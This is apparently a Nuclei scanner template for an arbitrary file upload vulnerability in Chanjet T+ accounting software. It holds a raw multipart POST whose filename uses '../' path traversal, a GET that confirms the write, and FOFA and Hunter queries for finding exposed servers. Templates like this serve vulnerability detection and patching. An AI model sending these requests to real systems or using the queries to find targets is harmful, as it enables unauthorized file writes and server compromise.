id: chanjet-Tplus-upload-Upload

info:
  name: chanjet-Tplus-upload-Upload
  author: p1z
  severity: critical
  description: |
    漏洞影响的产品和版本：畅捷通T+单机版<=17.0且使用IIS10.0以下版本。
  reference:
    https://blog.csdn.net/qq_50854662/article/details/127766573
  metadata:
    fofa-query: app="畅捷通-TPlus"
    hunter-query: app.name="畅捷通 T+"
    verified: true
  tags: 2022,chanjet-Tplus,fileupload


requests:
  - raw:
      - |
        POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=7389b73c3c705c1b86f1fc81896927ce
        
        --7389b73c3c705c1b86f1fc81896927ce
        Content-Disposition: form-data; name="File1"; filename="../1nfo.txt"
        Content-Type: image/jpeg
        
        hello world
        --7389b73c3c705c1b86f1fc81896927ce--

      - |
        GET /tplus/SM/SetupAccount/1nfo.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - 'hello world'